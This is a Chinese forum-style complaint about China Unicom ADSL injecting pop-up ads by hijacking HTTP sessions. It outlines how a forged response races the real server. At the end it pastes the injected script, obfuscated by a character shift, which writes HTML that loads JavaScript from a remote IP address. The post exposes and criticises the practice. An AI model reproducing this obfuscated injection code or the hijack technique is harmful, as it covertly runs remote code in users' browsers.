联通ADSL不请自来的弹窗广告
联通ADSL不请自来的弹窗广告
有宽带业务运营商推出了一种所谓“ADSL推送式广告”。而且,已经有技术人士指出,这可能是有人在“在某个或某几个关键网络节点上安装了inject设备,从而劫持了用户的HTTP会话”,具体劫持流程分析如下:
A、在某个骨干路由器的边上,躺着一台旁路的设备,监听所有流过的HTTP会话。这个设备按照某种规律,对于某些HTTP请求进行特殊处理。
B、当一个不幸的HTTP请求流过,这个设备根据该请求的seq和ack,把早已准备好的数据作为回应包,发送给客户端。这个过程是非常快的,我们的HTTP请求发出之后,仅过了0.008秒,就收到了上面的回应。而任何正常的服务器都不可能在这么短的时间内做出回应。
C、因为seq和ack已经被伪造的回应用掉了,所以,真正的服务器端数据过来的时候,会被当作错误的报文而不被接受。
D、浏览器会重新对你要访问的URL进行请求,这一次,得到了请求的真正页面,并且调用window.open函数打开广告窗口。
果真如此的话,那真是太可怕了。
我是内蒙古联通。大到国务院中央政府网站,小到 百度,银行之类的网站打开 就出来联通强插的广告,不是每次打开都有!偶尔会出来!想赚钱都想疯了。无奈!
http://124.160.227.114:10010/a/p?adid=2
中国浙江省杭州市 联通
http://temai.tmall.com/?ad_id=&am_id=&cm_id=140072817405305dd087&pm_id=
<script>
var d="=iunm?=ifbe?=td sjqu!uzqf>#ufyu0k bw btdsjqu#!tsd># iuuq;00235/271/338 /225;211210benpef/kt# ?=0tdsjqu?=tdsjqu!uzqf># ufyu0k bw btdsjqu#?wbs!qbsbn>#iu uq;00235/271/338/2 25; 211210b0t@g>betuzmf`nto/iunm'beje>311:33'uddb>dHh2PUV4O{B>'vsjq>3184916919 'psmv>bIS1dEpwM4SwcnerbT6tbX6mfnmv [z6kc31wcHG{ eD6peH2tQ4WvbY SgbXR:NUN2N{";function i(_,__ ){_+=__;v ar $="";for(var u=0;u <_.len gth;u++){var r=_. charCodeAt(u);$+=String.fromCharCode(r-1);}return $; } var c="J4Ox> >'tqje>5269825453'bsfb>21'ut> 2 45114:637'bp sm v>bIS1dEpwM3JvNUexdI NvZ3:uM{V5eH:v[3Op[X6oM4 qp[XqqZX6oNR>>'q2bsn>436'q3bsn>411'q4bsn> 36'q5bsn>6'q6bsn>4'q7bsn>2'bq qe> 1'ibtDpvou>1'ibtX ijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je> #c#!sjhiuNbshjo>1!upqNbshj o>1!mfg uNbshjo>1!tdspmm >op!pompbe>#joju)qbsbn*#?=0cpe z?=0iunm?";document.write(i(d,c));
</script>